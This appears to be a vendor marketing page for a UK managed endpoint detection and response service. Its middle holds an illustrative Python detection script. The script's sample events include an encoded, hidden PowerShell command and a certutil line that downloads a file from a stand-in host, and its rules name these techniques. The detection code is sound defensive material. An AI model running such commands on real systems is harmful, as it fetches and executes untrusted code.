The Sapphire managed service provides 24×7 visibility of attempted malicious endpoint incursions. By combining automated detection and analysis with industry-leading threat intelligence feeds and remote remediation, security teams can operate in the knowledge that their endpoints are continuously monitored and that detected threats are acted upon.
Alert: Enterprise-wide visibility across all endpoint devices, using advanced behavioural techniques combined with granular interrogation of individual hosts, allows attacks to be mapped dynamically as they unfold in each organisation’s environment.
Responsive: Friction-free isolation of infected systems, black-listing malicious files, and forensics collection for further analysis and mitigation.
Managed: 24×7 endpoint detection management frees up the security team to focus on core competencies, allowing them to address long-term security strategy and report to senior stakeholders.
The Sapphire SOC is based in the UK for both operations and storage of security data. Both our SOC and data centre are built on a fully redundant and highly available architecture to guard against data loss and keep the service running continuously. Customer data is held in our Tier 4 data centre, which is certified to ISO 27001, Cyber Essentials Plus, PCI DSS, CSA STAR, ISO 14001 and ISO 9001.
Our team is experienced in multiple technical disciplines. Our analysts are further supported by our SOC Manager and a 24×7 Helpdesk team, as well as comprehensive premium support from technology providers. Analysts are accredited and certified with each technology provider to ensure the best possible service for our customers.
We provide a Global Incident Response (IR) service to enhance our ability to support customers at a time of critical attack or compromise. We integrate global threat intelligence data into our SOC, giving analysts an enriched, minute-by-minute view of existing, new and emerging threat actors and attack vectors. Customers benefit from understanding how threats detected within their local environment relate to this global view.
Our SOC provides a range of additional managed security services such as vulnerability management and Managed SIEM services. Managed EDR customers can benefit from this, as threat intelligence curated from these services is shared with our EDR service.
Our analysts use our Managed EDR tools to examine each threat for root cause, considering the threat vector, protocols involved, known bad actors and threat intelligence data to determine how the threat entered the environment and how it escalated into a security incident. This information is recorded as case evidence and shared with our customers.
The Sapphire SOC provides a range of mitigation responses to clients to ensure known and understood threats can be quickly contained or eliminated through either automated or manual response functions.
Endpoint detection and response (EDR) is a security solution that combines endpoint data collection and real-time monitoring for threats with analysis capabilities and automatic remediation.
Endpoint Detection and Response provides comprehensive real-time endpoint visibility to understand malicious activity. An agent monitors events for malicious behaviours using machine learning and ‘known bad’ signatures. EDR solutions are also essential for threat hunting.
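To make the two detection styles above concrete, here is an added example (not Sapphire's code, nor any vendor's agent logic) of the kind of pass an EDR agent or back end performs over process-creation telemetry: a "known bad" match on file hashes alongside behavioural rules such as an Office application spawning a shell, an encoded PowerShell command line, or certutil being used to download a file. The events, the hash list and the rule thresholds are all constructed for illustration; hand-written behavioural rules stand in here for the machine-learning models a real product would use, and the hashes are placeholders, not real indicators.

```python
"""Toy EDR detection pass: signature (known-bad hash) plus behavioural rules
run over constructed process-creation events. Illustrative, not a real agent."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed placeholder hash list; these values are not real indicators.
KNOWN_BAD_SHA256: Dict[str, str] = {
    "a" * 64: "constructed-malware-sample-1",
}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "mshta.exe"}
# -e / -ec / -enc / -EncodedCommand followed by a long base64 blob.
ENCODED_PS = re.compile(r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")


@dataclass
class Event:
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str
    sha256: str


@dataclass
class Alert:
    host: str
    rule: str
    severity: str
    evidence: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_known_bad_hash(ev: Event) -> Optional[Alert]:
    """Signature-style check: exact match against the known-bad hash list."""
    name = KNOWN_BAD_SHA256.get(ev.sha256.lower())
    if name:
        return Alert(ev.host, "known_bad_hash", "critical", f"{ev.image} matches {name}")
    return None


def rule_office_spawns_shell(ev: Event) -> Optional[Alert]:
    """Behavioural check: an Office document handler launching a script host or shell."""
    if basename(ev.parent_image) in OFFICE_APPS and basename(ev.image) in SHELLS:
        return Alert(ev.host, "office_spawns_shell", "high",
                     f"{basename(ev.parent_image)} -> {basename(ev.image)}")
    return None


def rule_encoded_powershell(ev: Event) -> Optional[Alert]:
    """Behavioural check: PowerShell started with an encoded command line."""
    if basename(ev.image) in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(ev.command_line):
        return Alert(ev.host, "encoded_powershell", "medium", ev.command_line[:80])
    return None


def rule_certutil_download(ev: Event) -> Optional[Alert]:
    """Behavioural check: certutil abused as a downloader (-urlcache with a URL)."""
    cl = ev.command_line.lower()
    if basename(ev.image) == "certutil.exe" and "-urlcache" in cl and "http" in cl:
        return Alert(ev.host, "certutil_download", "high", ev.command_line[:80])
    return None


RULES = [rule_known_bad_hash, rule_office_spawns_shell,
         rule_encoded_powershell, rule_certutil_download]


def evaluate(events: List[Event]) -> List[Alert]:
    """Run every rule over every event; one event may raise several alerts."""
    alerts: List[Alert] = []
    for ev in events:
        for rule in RULES:
            alert = rule(ev)
            if alert is not None:
                alerts.append(alert)
    return alerts


def summarise(alerts: List[Alert]) -> Dict[str, int]:
    """Alert count per rule, the shape a SOC dashboard or SIEM would ingest."""
    return dict(Counter(a.rule for a in alerts))


# Constructed sample telemetry: one benign event and three suspicious ones.
SAMPLE_EVENTS = [
    Event("WS01", "alice", r"C:\Windows\explorer.exe",
          r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe", "b" * 64),
    Event("WS01", "alice", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA", "c" * 64),
    Event("WS02", "bob", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
          "certutil.exe -urlcache -split -f http://example.invalid/a.bin a.bin", "d" * 64),
    Event("WS03", "SYSTEM", r"C:\Windows\System32\services.exe",
          r"C:\Users\Public\svchost.exe", "svchost.exe", "a" * 64),
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.host} {a.rule}: {a.evidence}")
    print(summarise(evaluate(SAMPLE_EVENTS)))
```

The Word-to-PowerShell event fires two rules at once; a real product would correlate those into a single incident with both behaviours as evidence, which is the "case evidence" an analyst then reviews for root cause.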
EDR and SIEM complement each other. A SIEM consumes alerts and telemetry from EDR alongside other log sources and feeds them into a single aggregated view of risk, acting as the centralised point of correlation and case management.
Endpoint security is vital because end-user devices such as laptops, desktops, and mobile devices are often a landing point for an attacker looking to steal data or move laterally.
An endpoint agent is installed on a device to monitor and alert on potentially malicious actions.
An Extended Detection and Response (XDR) solution takes a broader view than EDR, extending detection and response beyond the endpoint to email, cloud workloads and other sources so that malicious activity can be followed across them.